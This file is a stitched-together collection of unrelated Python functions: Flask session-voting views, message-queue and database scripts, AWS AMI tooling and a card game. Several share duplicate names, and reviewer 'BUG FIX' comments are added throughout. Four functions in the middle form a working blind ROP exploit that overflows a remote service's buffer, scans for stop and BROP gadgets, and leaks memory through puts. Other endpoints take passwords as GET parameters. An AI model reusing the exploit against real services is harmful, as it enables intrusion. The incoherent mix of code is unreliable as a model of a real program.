def api_vote():
    """Return one vote as JSON when ``_id`` is given, else every vote."""
    from flask import request

    _id = request.args.get('_id', None)
    if not _id:
        return json.dumps(list(utils.connect('vote').find({})))
    vote = dict(utils.connect('vote').find_one({"_id": _id}))
    return json.dumps(vote)
def main():
    """Read messages from stdin and publish each one to the 'hello' queue."""
    connection = connect("localhost")
    stdout.write("Connecting to queue...")
    channel = connection.channel()
    channel.queue_declare(queue="hello")
    stdout.write("Established.\n")
    msg = None
    stdout.write("\nEnter a message. To exit press CTRL+C.\n")
    while True:
        try:
            if not msg:
                msg = input(">>> ")
            channel.basic_publish(exchange="",
                                  routing_key="hello",
                                  body=msg.encode())
            msg = None
        except KeyboardInterrupt:
            stdout.write("\n")
            connection.close()
            break
        except pika.exceptions.AMQPError:
            # Broker dropped: reconnect and retry the pending message
            # (msg is still set, so we do not re-prompt).
            connection = connect("localhost")
            channel = connection.channel()
            continue
def dashboard():
    """Render the 50 most-voted sessions with their full vote details."""
    payload = []
    for raw in utils.connect('session').find({}):
        entry = dict(raw)
        entry['user_obj'] = dict(
            utils.connect('user').find_one({"_id": entry['user']}))
        payload.append(entry)
    payload = sorted(payload, key=lambda x: x['votes'], reverse=True)[:50]
    for entry in payload:
        entry['all_votes'] = []
        for raw_vote in utils.connect('vote').find({"session": entry["_id"]}):
            vote = dict(raw_vote)
            voter = dict(
                utils.connect('user').find_one({"_id": vote['user']}))
            # Strip credential fields before exposing the user record.
            for secret in ['login_hash', 'updated', 'password']:
                del voter[secret]
            vote['user'] = voter
            vote['vote_time'] = datetime.datetime.fromtimestamp(
                vote['created'])
            vote['user_time'] = datetime.datetime.fromtimestamp(
                voter['created'])
            entry['all_votes'].append(vote)
    return render_template('dashboard.html', sessions=payload, VOTING=True)
def dashboard(methods=['GET']):
    """Render the 25 most-voted sessions (per-vote details intentionally off).

    NOTE(review): `methods` looks like it belongs in the route decorator,
    not the view signature; kept unchanged for interface compatibility.
    """
    sessions = utils.connect('session').find({})
    payload = []
    for s in sessions:
        s = dict(s)
        s['user_obj'] = dict(utils.connect('user').find_one({"_id": s['user']}))
        payload.append(s)
    payload = sorted(payload, key=lambda x: x['votes'], reverse=True)[:25]
    # The commented-out vote-expansion block was dead code and has been
    # removed; the template only needs the (empty) 'all_votes' key to exist.
    for s in payload:
        s['all_votes'] = []
    return render_template('dashboard.html', sessions=payload, VOTING=True)
def main():
    """CLI entry point: deploy the DKG contract or run a node against it."""
    global args, node, contract, account, w3
    args = parse_cli_arguments()
    logging._info = logging.info
    logging.info = default_logging_info if args.verbose else trimmed_logging_info
    w3 = utils.connect()
    if args.node_idx < -1 or args.node_idx >= len(w3.eth.accounts):
        # NOTE(review): execution continues after this error and the
        # index is still used below -- an explicit exit may be intended;
        # behavior kept as-is.
        logging.error(
            'invalid node-idx specified, check that the specified account is '
            'available in Ganache'
        )
    account = w3.eth.accounts[args.node_idx]
    if args.cmd == 'deploy':
        deploy()
    elif args.cmd == 'run':
        w3 = utils.connect()
        contract = utils.get_contract('DKG', args.contract)
        node = EthNode(account)
        node.connect(contract)
        run()
def main():
    """Extracts or transforms and loads the data at the users request."""
    # BUG FIX: `conn` was referenced after the loop without being defined
    # when the user quit ("Q") before running any command.
    conn = None
    while True:
        cmd = get_command()
        if cmd == "C":
            print("\nDrop then re-create all tables (~1 minute)")
            cur, conn = connect()
            create_tables(cur, conn)
        elif cmd == "L":  # load data
            print("\nLoading data (~20 minutes)")
            cur, conn = connect()
            load_staging_tables(cur, conn)
        elif cmd == "I":  # insert data
            print("\nInserting data (~2 minutes)")
            cur, conn = connect()
            insert_tables(cur, conn)
        elif cmd == "Q":
            break
    # NOTE(review): only the most recent connection is closed; connections
    # opened by earlier commands in the same run are leaked.
    if conn is not None:
        conn.close()
def index():
    """Show a shuffled session list while voting is open, else the create form."""
    if not settings.VOTING:
        return render_template('create_session.html',
                               VOTING=settings.VOTING,
                               ACTIVE=settings.ACTIVE)
    payload = []
    for raw in utils.connect('session').find({}):
        entry = dict(raw)
        owner = utils.connect('user').find_one({"_id": entry['user']})
        entry['user_obj'] = dict(
            utils.connect('user').find_one({"_id": entry['user']}))
        entry['username'] = owner['name']
        payload.append(entry)
    # Shuffle so early-created sessions get no placement advantage.
    random.shuffle(payload)
    return render_template('session_list.html',
                           sessions=payload,
                           VOTING=settings.VOTING,
                           ACTIVE=settings.ACTIVE)
def dashboard(secret_key, methods=['GET']):
    """Render the 100 most-voted sessions with vote details, behind an API key.

    Returns an empty JSON object when ``secret_key`` does not match API_KEY.
    """
    if secret_key != os.environ.get('API_KEY', None):
        return json.dumps({})
    sessions = utils.connect('session').find({})
    payload = []
    for s in sessions:
        try:
            s = dict(s)
            s['user_obj'] = dict(
                utils.connect('user').find_one({"_id": s['user']}))
            payload.append(s)
        except Exception:
            # BUG FIX: was a bare `except:` which also swallowed
            # SystemExit/KeyboardInterrupt; sessions whose owner lookup
            # fails are still skipped.
            pass
    payload = sorted(payload, key=lambda x: x['votes'], reverse=True)[:100]
    for s in payload:
        s['all_votes'] = []
        votes = utils.connect('vote').find({"session": s["_id"]})
        for v in votes:
            vote = dict(v)
            user = dict(utils.connect('user').find_one({"_id": vote['user']}))
            # Never expose credential fields.
            for x in ['login_hash', 'updated', 'password']:
                del user[x]
            vote['user'] = user
            vote['vote_time'] = datetime.datetime.fromtimestamp(vote['created'])
            vote['user_time'] = datetime.datetime.fromtimestamp(user['created'])
            s['all_votes'].append(vote)
    return render_template('dashboard.html', sessions=payload, VOTING=True)
def api_session():
    """Return one session as JSON when ``_id`` is given, else all sessions."""
    from flask import request

    _id = request.args.get('_id', None)
    if _id:
        session = dict(utils.connect('session').find_one({"_id": _id}))
        return json.dumps(session)
    return json.dumps(list(utils.connect('session').find({})))
def __init__(self, *args, **kwargs):
    """Wire ranking/game signals and initialise the bot's state."""
    connect("ranking_updated", self.edit_leaderboard)
    connect("game_registered", self.send_game_result)
    self.player_manager = None
    self.ranking = None
    # Determine if the bot is ready to process commands
    self.is_ready = False
    super().__init__(*args, **kwargs)
def index():
    """List all sessions with owner names, most-voted first."""
    payload = []
    for raw in utils.connect('session').find({}):
        entry = dict(raw)
        owner = utils.connect('user').find_one({"_id": entry['user']})
        entry['username'] = owner['name']
        payload.append(entry)
    payload.sort(key=lambda x: x['votes'], reverse=True)
    return render_template('session_list.html',
                           sessions=payload,
                           VOTING=settings.VOTING)
def api_user():
    """Return one sanitised user as JSON when ``_id`` is given, else all users."""
    from flask import request

    _id = request.args.get('_id', None)
    if not _id:
        return json.dumps(list(utils.connect('user').find({})))
    user = dict(utils.connect('user').find_one({"_id": _id}))
    # Never expose credentials or tracking fields through the API.
    for field in ['login_hash', 'updated', 'created', 'password',
                  'fingerprint']:
        del user[field]
    return json.dumps(user)
def update_records(self):
    """Refresh this user's cached voted-for / pitched session ids and persist."""
    vote_coll = utils.connect('vote')
    session_coll = utils.connect('session')
    self.sessions_voted_for = [doc['session']
                               for doc in vote_coll.find({"user": self._id})]
    self.sessions_pitched = [doc['_id']
                             for doc in session_coll.find({"user": self._id})]
    self.save()
def index():
    """List sessions with their owner objects, highest vote count first."""
    payload = []
    for raw in utils.connect('session').find({}):
        entry = dict(raw)
        entry['user_obj'] = dict(
            utils.connect('user').find_one({"_id": entry['user']}))
        payload.append(entry)
    payload.sort(key=lambda s: s['votes'], reverse=True)
    return render_template('session_list.html', sessions=payload)
def index():
    """Render the session list ordered by vote count (descending)."""
    sessions = [dict(s) for s in utils.connect('session').find({})]
    for entry in sessions:
        entry['user_obj'] = dict(
            utils.connect('user').find_one({"_id": entry['user']}))
    sessions.sort(key=lambda e: e['votes'], reverse=True)
    return render_template('session_list.html', sessions=sessions)
def homepage():
    """Music box landing page: render on GET, handle the login form on POST."""
    utils.connect()
    if request.method == "GET":
        return render_template("musicboxhome.html")
    global current_user
    button = str(request.form["button"])
    if button == "Login":
        user = request.form.get("login-or-register")
        current_user = utils.add_or_view_user(user)
        session["user"] = current_user
        songs = utils.get_songs(current_user)
    return redirect("/" + current_user)
def check_voters():
    """Print fingerprints shared by several users, with their voting activity."""
    seen = []
    duplicates = []
    for u in utils.connect('user').find({}):
        if u['fingerprint'] in seen:
            duplicates.append(u['fingerprint'])
        else:
            seen.append(u['fingerprint'])
    for fp in duplicates:
        print(fp)
        print([(u['name'], u['email'], u['created'],
                len(u['sessions_voted_for']))
               for u in utils.connect('user').find({"fingerprint": fp})
               if len(u['sessions_voted_for']) > 0])
def session_action(methods=['GET']):
    """Create a session for the given user; returns a JSON status payload."""
    from flask import request

    _id = request.args.get('user', None)
    session_dict = {
        'title': request.args.get('title', None),
        'description': request.args.get('description', None),
        'votes': 0,
        'accepted': False,
    }
    if not _id:
        # BUG FIX: the original dumped an already-json.dumps'd string again,
        # so the client received a double-encoded payload. Encode once.
        return json.dumps({
            "success": False,
            "text": "Please send a valid user ID and a session title "
                    "and description."
        })
    # Looking the user up validates that the id exists (raises -> 500 if not).
    user = dict(utils.connect('user').find_one({"_id": _id}))
    session_dict['user'] = _id
    s = models.Session(**session_dict).save()
    tally()
    return json.dumps({
        "success": True,
        "action": "create",
        "session": s['_id'],
    })
def delete_syllabs_tables(student=None):
    """Drop every syllabs record, or only the rows for ``student``."""
    db = connect()
    if student is not None:
        db.student_syllabs.delete_many({"student": student})
    else:
        db.student_syllabs.drop()
    return True, ""
def user_action(methods=['GET']):
    """Log a user in, or register them when the email is unknown."""
    from flask import request

    email = request.args.get('email', None)
    password = request.args.get('password', None)
    not_found = json.dumps({"success": False,
                            "text": "Username or password is incorrect."})
    existing = utils.connect('user').find_one({"email": email})
    if existing:
        # Known email: authenticate against the stored record.
        u = models.User(**dict(existing))
        if u.auth_user(password):
            return json.dumps({"success": True,
                               "_id": u._id,
                               "name": u.name,
                               "votes": "|".join(u.sessions_voted_for),
                               "action": "login"})
        return not_found
    # Unknown email: register, provided name and fingerprint were sent.
    name = request.args.get('name', None)
    fingerprint = request.args.get('fingerprint', None)
    if not name or not fingerprint:
        return not_found
    u = models.User(email=email, name=name, password=password,
                    fingerprint=fingerprint)
    u.save()
    return json.dumps({"success": True,
                       "_id": u._id,
                       "name": u.name,
                       "votes": "|".join(u.sessions_voted_for),
                       "action": "register"})
def init(dirs, archived=True):
    """Bootstrap the database from the files in ``dirs``.

    dirs: mapping with "to" (clean files), "ref" (reference files) and
        "old" (archive target) directories.
    archived: when True, dump-and-drop the current data into dirs["old"]
        before re-inserting.
    Returns (ok, message).
    """
    if not dir_exists("logs"):
        os.makedirs("logs")
    db = connect()  # opens the connection; kept for its side effect
    clean_dir = dirs["to"]
    ref_dir = dirs["ref"]
    archived_dir = dirs["old"]
    if dir_empty(dirs["to"]):
        # BUG FIX: message read "found found".
        msg = "No files found in {}. Aborting.".format(dirs["to"])
        return False, msg
    if archived is True:
        # BUG FIX: the original tested/created `archived` (a boolean)
        # instead of the archive directory path.
        if not dir_exists(archived_dir):
            os.makedirs(archived_dir)
        dump_and_drop(archived_dir)
    insert_datasets(clean_dir, True)
    insert_students(clean_dir, ref_dir)
    insert_path(ref_dir)
    return True, ""
def main():
    """Consume messages from the 'hello' queue and archive them in Postgres."""
    global postgres_connection
    global rabbit_connection
    global cur
    rabbit_connection = connect("rabbit")
    stdout.write("Connecting to queue...")
    channel = rabbit_connection.channel()
    channel.queue_declare(queue='hello')
    channel.basic_consume(callback, queue='hello', no_ack=True)
    stdout.write("Established.\n")
    stdout.write("Connecting to database...")
    postgres_connection = psycopg2.connect(host="db",
                                           user="******",
                                           password="******",
                                           dbname="ivbelkin_db")
    cur = postgres_connection.cursor()
    stdout.write("Established.\n")
    stdout.write("Creating table 'ivbelkin_db'...")
    cur.execute("CREATE TABLE IF NOT EXISTS ivbelkin_db (data varchar);")
    postgres_connection.commit()
    stdout.write("Completed.\n")
    stdout.write("Waiting for messages.\n")
    try:
        channel.start_consuming()
    except KeyboardInterrupt:
        # Ctrl+C: release database resources before exiting.
        cur.close()
        postgres_connection.close()
def getStopGadgets(pad, base_addr, ref, debug=False):
    """Scan for "stop gadgets": return addresses that keep the service alive.

    Tries every offset in [base_addr, base_addr + 0x1500); an address is a
    stop gadget when the reference output ``ref`` still appears afterwards.
    """
    log.info(f'searching stop gadgets, base addr = {hex(base_addr)}')
    found = []  # found addresses
    start = 0x0
    end = start + 0x1500
    for off in range(start, end):
        r = connect()
        try:
            # build payload
            addr = base_addr + off
            pld = b'X' * pad  # fill buffer
            pld += p64(addr)  # rip
            debugInfo(f'searching stop gadgets, trying {hex(addr)}', debug)
            # send pld and check if ref is in output
            r.recv(timeout=timeout)
            r.send(pld)
            res = r.recv(timeout=timeout)
            if ref in res:
                found.append(addr)  # this address is a stop gadget
        except Exception:
            # BUG FIX: narrowed from a bare `except:` which also swallowed
            # KeyboardInterrupt, making the scan impossible to interrupt;
            # target crashes are still ignored.
            pass
        disconnect(r)
    return found  # return found stop gadgets
def leakData(ref, pad, pop_rdi, puts_addr, leak_addr, stop_gadget, debug):
    """Leak the bytes at ``leak_addr`` via puts(); returns bytes or None.

    Returns b'\\x00' when the leaked byte is NUL (puts prints nothing).
    """
    r = connect()
    debugInfo(f'leaking data at addr {hex(leak_addr)}', debug)
    # build payload
    pld = b'X' * pad                      # fill buffer
    pld += p64(pop_rdi) + p64(leak_addr)  # load addr we want to leak in `rdi`
    pld += p64(puts_addr)                 # puts addr with the arg we control
    pld += p64(stop_gadget)               # stop gadget
    # send payload
    r.recv(timeout=0.1)
    r.send(pld)
    # if no more output
    try:
        rec = r.recv(timeout=timeout)
    except Exception:
        # BUG FIX: narrowed from a bare `except:`, and the socket is now
        # closed on this early-exit path (it used to be leaked).
        disconnect(r)
        return None
    data = b'\x00'
    try:
        # parse output to get the leak
        data = rec[rec.index(b'@') + 1:rec.index(b'\n' + ref)]
    except ValueError:
        # marker or terminator missing -> null byte
        pass
    # close socket and return the leak
    disconnect(r)
    return data if data else b'\x00'
def getSrcTableData(srcTable, strtSK, endSK):
    """Run the configured query for ``srcTable`` over the SK range.

    Returns (resultSet, status); resultSet is None when the query fails.
    """
    global next_token
    resultSet = None
    try:
        conn = utils.connect(logger, dbEngine, dbEndpoint, dbPort, dbMisc,
                             dbUser, dbPwd)
        conn.outputtypehandler = OutputTypeHandler
        cur = conn.cursor()
        sql = (sq.srcTableQyery[srcTable]
               .replace('<MIN_SK_NM>', str(strtSK))
               .replace('<MAX_SK_NM>', str(endSK)))
        resultSet = utils.queryDB(logger, dbEngine, conn, sql, cur)
        status = True
    except Exception as e:
        next_token = logger.writeLog(
            'Error', 'Error on getSrcTableData function for query: ',
            srcTable, e, nextToken=next_token)
        status = False
    return resultSet, status
def tables(action, student=None):
    '''TABLES function to create, delete OR update the table in order of
    declaration in settings.TABLES
    '''
    # Rotate a dedicated tables.log in LOG_DIR.
    logger = logging.getLogger()
    logger.setLevel(logging.DEBUG)
    formatter = logging.Formatter(
        '%(asctime)s :: %(levelname)s :: %(message)s')
    file_handler = RotatingFileHandler(os.path.join(LOG_DIR, 'tables.log'),
                                       'a', 1000000, 1)
    file_handler.setLevel(logging.DEBUG)
    file_handler.setFormatter(formatter)
    logger.addHandler(file_handler)
    msg = ""
    if action in ["create", "update"]:
        # Creating/updating stats tables is pointless without source records.
        db = connect()
        if db.records.count() == 0:
            msg = "No records in database. Aborting"
            logger.critical("No records in database. Aborting")
            return False, msg
    logger.info("stats.main.tables(action={}, student={})".format(
        action, student))
    if action == "update":
        # Update = delete every table, then create every table.
        for table_name in STATS_TABLES:
            table(table_name, "delete", student)
        for table_name, req in zip(STATS_TABLES, REQUIRED_TABLES):
            table(table_name, "create", student, req)
    else:
        for table_name, req in zip(STATS_TABLES, REQUIRED_TABLES):
            table(table_name, action, student, req)
    return True, msg
def __init__(self, tag, device='/dev/xvdf', mount='/data'):
    """Parse a "key:value" tag and open an EC2 connection for this instance."""
    parts = tag.split(':')
    self.tag = {'key': parts[0], 'value': parts[1]}
    self.c = utils.connect(boto.ec2.EC2Connection)
    self.this_instance = utils.get_this_instance()
    self.device = device
    self.mount = mount
def getBropGadgets(pad, base_addr, ref, stop_gadgets, debug):
    """Scan for BROP gadgets (pop x6; ret) using the first stop gadget.

    Returns the candidate addresses found in [base_addr, base_addr + 0x2000).
    """
    stop_gadget = stop_gadgets[0]
    log.info(f'searching BROP gadgets, base addr = {hex(base_addr)}')
    start = 0
    end = start + 0x2000
    gadgets = []
    # iterate over the whole ELF
    for off in range(start, end):
        r = connect()
        try:
            # build payload
            addr = base_addr + off
            pld = b'X' * pad         # fill buffer
            pld += p64(addr)         # overwrite `rip` with gadget
            pld += p64(0) * 6        # 6 addresses popped into registers
            pld += p64(stop_gadget)  # regain exec flow control with the `ret`
            debugInfo(f'searching brop gadgets, trying {hex(addr)}', debug)
            # send payload and receive response
            r.recv(timeout=timeout)
            r.send(pld)
            res = r.recv(timeout=timeout)
            if ref in res:
                # /!\ be careful with false positives /!\
                if addr not in stop_gadgets:
                    gadgets.append(addr)
        except Exception:
            # BUG FIX: narrowed from a bare `except:` which also swallowed
            # KeyboardInterrupt; target crashes are still ignored.
            pass
        disconnect(r)
    return gadgets  # return found BROP gadgets
def __init__(self, tag, device='/dev/xvdf', mount='/data'):
    """Split the "key:value" tag, connect to EC2 and record mount settings."""
    key_part, value_part = tag.split(':')[0], tag.split(':')[1]
    self.tag = {'key': key_part, 'value': value_part}
    self.c = utils.connect(boto.ec2.EC2Connection)
    self.this_instance = utils.get_this_instance()
    self.device = device
    self.mount = mount
def main(env):
    """Initialise the MySQL schema for ``env`` from db_init.sql, then list tables."""
    # Load configuration
    config = utils.load_config(env)
    mysql_config = config["mysql"]
    # Print DB info
    print(f"Environment : {env}")
    print(f"MySQL host : {mysql_config['host']}:{mysql_config['port']}")
    print(f"MySQL database : {mysql_config['db']}")
    # Connect to database and grab a cursor
    db_connection = utils.connect(mysql_config)
    db_cursor = db_connection.cursor()
    # The SQL file contains several statements separated by "===".
    for statement in utils.get_sql("db_init.sql").split("==="):
        if len(statement) > 0:
            db_cursor.execute(statement)
    # List database tables
    db_cursor.execute("SHOW TABLES")
    for table in db_cursor:
        print(table)
    # Close the cursor, then the connection
    db_cursor.close()
    db_connection.close()
def __init__(self, options, columns):
    """Memcache FDW: read row_id / expire / prefix options and connect."""
    super(PymcacheFDW, self).__init__(options, columns)
    # row_id column name
    if 'row_id' in options:
        self._row_id_name = options['row_id']
    else:
        # BUG FIX: dict.keys() is not subscriptable on Python 3; take the
        # first declared column via next(iter(...)) instead.
        self._row_id_name = next(iter(columns))
        log_to_postgres(
            'Using first column as row_id name: %s' % self._row_id_name,
            WARNING)
    # "expire" value
    if 'expire' in options and options['expire'] is not None:
        self._expire = int(options['expire'])
    else:
        # presumably falls back to a class-level default -- confirm
        log_to_postgres('Using default "expire" value: %s' % self._expire,
                        WARNING)
    # "prefix" value
    self._prefix = options.get('prefix', '')
    if self._prefix is None:
        self._prefix = ''
    self._prefix_size = len(self._prefix)
    log_to_postgres('Using "prefix" value: %s' % self._prefix, WARNING)
    self._client = utils.connect(options)
def do_dns(self, options):
    "Get information about dns for every server"
    self.do_checkup(None)
    # List of servers from do_conn function
    ssh = utils.connect(self.servers)
    argv = options.split(' ')
    if argv[0] == '-f':
        # -f: write results to xboard.log instead of stdout.
        utils.filewrite('dns', ssh, self.servers)
        return
    elif argv[0] != '':
        # Unknown option: report and bail out.
        print("Error: Unknown argument '%s' for command dns!" % argv[0])
        return
    # Execute the command on every server and echo its output.
    for i in range(0, len(ssh)):
        ssh_stdin, ssh_stdout, ssh_stderr = ssh[i].exec_command('dns')
        for line in ssh_stdout.read().splitlines():
            print(line.decode('utf-8').replace(systemPrompt, ''))
        for linerr in ssh_stderr.read().splitlines():
            print('%s at %s on port %s'
                  % (linerr.decode('utf-8').replace(systemPrompt, ''),
                     self.servers['server'][i], self.servers['port'][i]))
        ssh[i].close()
def player_player_id_card_id(player_id, card_id):
    """Play ``card_id`` for ``player_id``: mark played, record the card,
    remove it from the hand, then redirect back to the player page."""
    with connect() as conn, conn.cursor() as cursor:
        short_params = (player_id,)
        long_params = (player_id, card_id)
        # Mark the player as having played this round.
        query_update = """
        UPDATE player
        SET has_played = true
        WHERE player_id = %s
        """
        cursor.execute(query_update, short_params)
        # Record the played card (idempotent thanks to ON CONFLICT).
        query_insert = """
        INSERT INTO played_card (player_id, card_id)
        VALUES (%s, %s)
        ON CONFLICT DO NOTHING
        """
        # Remove the card from the player's hand.
        query_delete = """
        DELETE FROM player_hand
        WHERE player_id = %s
        AND card_id = %s
        """
        cursor.execute(query_insert, long_params)
        cursor.execute(query_delete, long_params)
    return redirect(f'/player/{player_id}')
def insProcessTrack(lastSK, ProcessTable):
    """Insert a process-tracking row recording ``lastSK`` for ``ProcessTable``.

    Returns (resultSet, status); status is False when the insert fails.
    """
    global next_token
    resultSet = None
    try:
        conn = utils.connect(logger, dbEngine, dbEndpoint, dbPort, dbMisc,
                             dbUser, dbPwd)
        cur = conn.cursor()
        sql = (sq.sqlProcTrackQryIns
               .replace('<LAST_SK>', str(lastSK))
               .replace('<TABLE_NM>', ProcessTable))
        resultSet = utils.queryDB(logger, dbEngine, conn, sql, cur, True)
        status = True
    except Exception as e:
        next_token = logger.writeLog('Error',
                                     'Error on insProcessTrack function',
                                     e,
                                     nextToken=next_token)
        status = False
    return resultSet, status
def getPutsAddr(pad, stop_gadget, pop_rdi, base_addr, debug):
    """Locate puts@plt by calling each candidate with the gadget bytes as arg.

    Returns the address whose output echoes b'\\x5f\\xc3', or None if the
    BROP gadget was wrong.
    """
    # iterate over the whole ELF
    start = 0x0
    end = start + 0x2000
    log.info(f'searching puts addr, base addr = {hex(base_addr)}')
    for i in range(start, end):
        r = connect()
        try:
            # build payload
            addr = base_addr + i
            pld = b'X' * pad         # fill buffer
            pld += p64(pop_rdi)      # load `pop rdi; ret` opcodes in `rdi`
            pld += p64(pop_rdi)      # puts arg = '\x5f\xc3'
            pld += p64(addr)         # puts addr
            pld += p64(stop_gadget)  # stop gadget
            # send payload and receive response
            debugInfo(f'searching puts addr, trying {hex(addr)}', debug)
            r.recv(timeout=timeout)
            r.send(pld)
            res = r.recv(timeout=timeout)
            if b'\x5f\xc3' in res:
                # BUG FIX: close the socket before returning; the success
                # path used to leak the connection.
                disconnect(r)
                return addr
        except Exception:
            # BUG FIX: narrowed from a bare `except:` which also swallowed
            # KeyboardInterrupt; target crashes are still ignored.
            pass
        disconnect(r)
    # fail, the BROP gadget is not correct
    return None
def connect(self):
    """Open a connection from ``self.db`` settings, cache it and return it."""
    self._connection = connect(host=self.db.host,
                               db=self.db.name,
                               user=self.db.user,
                               passwd=self.db.passwd)
    return self._connection
def provision(self):
    """
    Provision route53 A records based on the tag "Name" of all instances
    in the network.

    - Assumes private hosted route53 zone
    - instances without a "Name" tag are silently skipped
    - instances not in a 'running' state are silently skipped
    - creates A record based on the "Name" tag
    - an A record may contain multiple private IPs

    :return: None
    """
    zone = self.conn.get_zone(self.zone)
    assert zone, "No hosted zones found"
    # Group instances by their tag "Name"
    instances = utils.connect(boto.ec2.EC2Connection).get_only_instances(
        filters={
            'instance-state-name': 'running',
            'vpc-id': utils.get_this_instance().vpc_id
        }
    )
    network_map = {}
    for instance in instances:
        # BUG FIX: the original called .lower() before the None check, so
        # an instance without a "Name" tag raised AttributeError instead
        # of being skipped.
        name = instance.tags.get('Name')
        if name is None:
            continue
        name = name.lower()
        if name not in network_map:
            network_map[name] = []
        network_map[name].append(instance.private_ip_address)
    current_records = {
        r.name.replace(self.zone, '').strip('.'): r
        for r in zone.get_records()
    }
    # Create any new records
    for new_record_name in set(network_map).difference(current_records):
        zone.add_a(
            name='{0}.{1}'.format(new_record_name, self.zone),
            value=network_map.pop(new_record_name),  # list is safe to pass
            ttl=30,
        )
    # Update any records that need to be updated.
    # BUG FIX: the original popped entries while iterating
    # network_map.keys(), which raises RuntimeError on Python 3; iterate
    # over a snapshot of the keys instead.
    for update_record_name in list(network_map.keys()):
        record_value = network_map.pop(update_record_name)
        if set(current_records[update_record_name].resource_records) != \
                set(record_value):
            zone.update_a(
                name='{0}.{1}'.format(update_record_name, self.zone),
                value=record_value,
                ttl=30,
            )
    assert len(network_map) == 0, "network_map has unused " \
                                  "entries: {0}".format(network_map)
def tally():
    """Recompute the cached vote count of every session and persist it."""
    collection = utils.connect("session")
    sessions = list(collection.find({}))
    for session_dict in sessions:
        s = Session(session_dict)
        s.update_records()
    # BUG FIX: converted a Python 2 `print` statement to a print() call,
    # consistent with the Python 3 syntax used elsewhere in the project.
    print("Updated %s sessions." % len(sessions))
def tally():
    """Refresh the cached records of every user and persist them."""
    collection = utils.connect("user")
    users = list(collection.find({}))
    for user_dict in users:
        u = User(user_dict)
        u.update_records()
    # BUG FIX: converted a Python 2 `print` statement to a print() call,
    # consistent with the Python 3 syntax used elsewhere in the project.
    print("Updated %s users." % len(users))
def share_marketplace(snapshot_id, region):
    """Grant the Marketplace account access to ``snapshot_id`` in ``region``."""
    conn = utils.connect(region)
    log.debug('getting snapshot - %s', snapshot_id)
    snapshot = conn.get_all_snapshots(snapshot_ids=[snapshot_id])[0]
    log.debug('sharing with marketplace')
    # 679593333241: presumably the AWS Marketplace account id -- confirm.
    snapshot.share(user_ids=['679593333241'])
    log.info('shared with marketplace - %s', snapshot_id)
def __init__(self, tag, key, ec2_user, script, script_args):
    """Resolve paths and credentials for running ``script`` on tagged hosts."""
    parts = tag.split(':')
    self.tag = {'key': parts[0], 'value': parts[1]}
    self.key = os.path.abspath(key)
    self.script = os.path.abspath(script)
    # Unique, timestamped name for the uploaded copy of the script.
    self.tmpfile = 'userscript_{time}.sh'.format(
        time=datetime.datetime.utcnow().strftime('%m.%d.%Y_%H:%M:%S')
    )
    self.user = ec2_user
    self.c = utils.connect(boto.ec2.connection.EC2Connection)
    self.script_args = script_args
def main():
    """Create ``count`` LXC containers named <env>-m<i> in the juju env."""
    logging.basicConfig(level=logging.DEBUG)
    parser = setup_parser()
    options = parser.parse_args()
    env = connect(options.env_name)
    for idx in range(options.offset, options.offset + options.count):
        container_name = "%s-m%d" % (options.env_name, idx)
        log.info("Creating container %s", container_name)
        add_container(env, container_name, options.base_name)
def share_public(ami_id, region):
    """Make ``ami_id`` publicly launchable in ``region``."""
    conn = utils.connect(region)
    log.debug('setting image to public - %s', ami_id)
    conn.modify_image_attribute(ami_id,
                                attribute='launchPermission',
                                operation='add',
                                groups=['all'])
    log.info('set image to public - %s' % ami_id)
def copy_image(ami_id, ami_name, ami_region, regions=None):
    """Copy an AMI into each destination region.

    regions: iterable of destination region names (default: none).
    Returns the list of pending Image objects.
    """
    # BUG FIX: mutable default argument ([]) replaced with a None sentinel;
    # passing [] explicitly still behaves identically.
    regions = regions if regions is not None else []
    images = []
    for region in regions:
        log.debug('copying %s (%s) to %s', ami_id, ami_region, region)
        conn = utils.connect(region)
        ret = conn.copy_image(ami_region, ami_id, ami_name)
        image = Image(ret.image_id, region)
        images.append(image)
        log.info('pending %s (%s) to %s (%s)',
                 ami_id, ami_region, image.id, region)
    return images
def login(username):
    """Account page for the logged-in user: render on GET, handle actions on POST."""
    global current_user
    global current_artist
    global current_artistID
    utils.connect()
    if request.method == "GET":
        songs = utils.get_songs(current_user)
        current_user = session["user"]
        return render_template("login.html", user=current_user, songs=songs)
    button = str(request.form["button"])
    if button == "Close account":
        utils.remove_user(current_user)
        return redirect("/")
    elif button == "Search":
        current_artist = request.form.get("search")
        current_artistID = str(musicservices.getID(
            musicservices.getArtistInfo(utils.curate(current_artist))))
        session["artist"] = current_artist
        session["aID"] = current_artistID
        return redirect("/" + current_user + "/" + current_artistID)
def register(ami_name, region, bucket=None, desc=None, arch=None):
    """Register an S3-backed AMI from its manifest; returns the new AMI id.

    NOTE(review): ``arch`` is accepted but unused here; kept for interface
    compatibility with callers.
    """
    desc = desc if desc else utils.parse_imagename(ami_name)['url']
    bucket = bucket if bucket else "turnkeylinux-" + region
    image_location = os.path.join(bucket, ami_name + ".manifest.xml")
    log.debug('registering image - %s', image_location)
    conn = utils.connect(region)
    ami_id = conn.register_image(name=ami_name,
                                 description=desc,
                                 image_location=image_location)
    log.info('registered image - %s %s', ami_id, image_location)
    return ami_id
def register(snapshot_id, region, arch, size=None, name=None, desc=None,
             pvm=False):
    """Register an EBS-backed AMI from ``snapshot_id``.

    Missing size/name default to the snapshot's volume size/description.
    pvm=True registers a paravirtual image with a region kernel instead of
    HVM. Returns (ami_id, name).
    """
    conn = utils.connect(region)
    if None in (name, size):
        log.debug('getting snapshot - %s', snapshot_id)
        snapshot = conn.get_all_snapshots(snapshot_ids=[snapshot_id])[0]
        size = size if size else snapshot.volume_size
        name = name if name else snapshot.description
    virt = 'hvm'
    kernel_id = None
    device_base = '/dev/xvd'
    ec2_arch = "x86_64" if arch == "amd64" else arch
    if pvm:
        kernel_id = utils.get_kernel(region, arch)
        virt = 'paravirtual'
        device_base = '/dev/sd'
        name += '-pvm'
    log.debug('creating block_device_map')
    block_device_map = BlockDeviceMapping()
    # Root volume: delete on termination, restored from the snapshot.
    rootfs = BlockDeviceType()
    rootfs.delete_on_termination = True
    rootfs.size = size
    rootfs.snapshot_id = snapshot_id
    rootfs_device_name = device_base + 'a'
    block_device_map[rootfs_device_name] = rootfs
    # Instance-store scratch volume.
    ephemeral = BlockDeviceType()
    ephemeral.ephemeral_name = 'ephemeral0'
    ephemeral_device_name = device_base + 'b'
    block_device_map[ephemeral_device_name] = ephemeral
    log.debug('registering image - %s', name)
    ami_id = conn.register_image(
        name=name,
        description=desc,
        kernel_id=kernel_id,
        architecture=ec2_arch,
        root_device_name=rootfs_device_name,
        block_device_map=block_device_map,
        virtualization_type=virt)
    log.info('registered image - %s %s %s', ami_id, name, region)
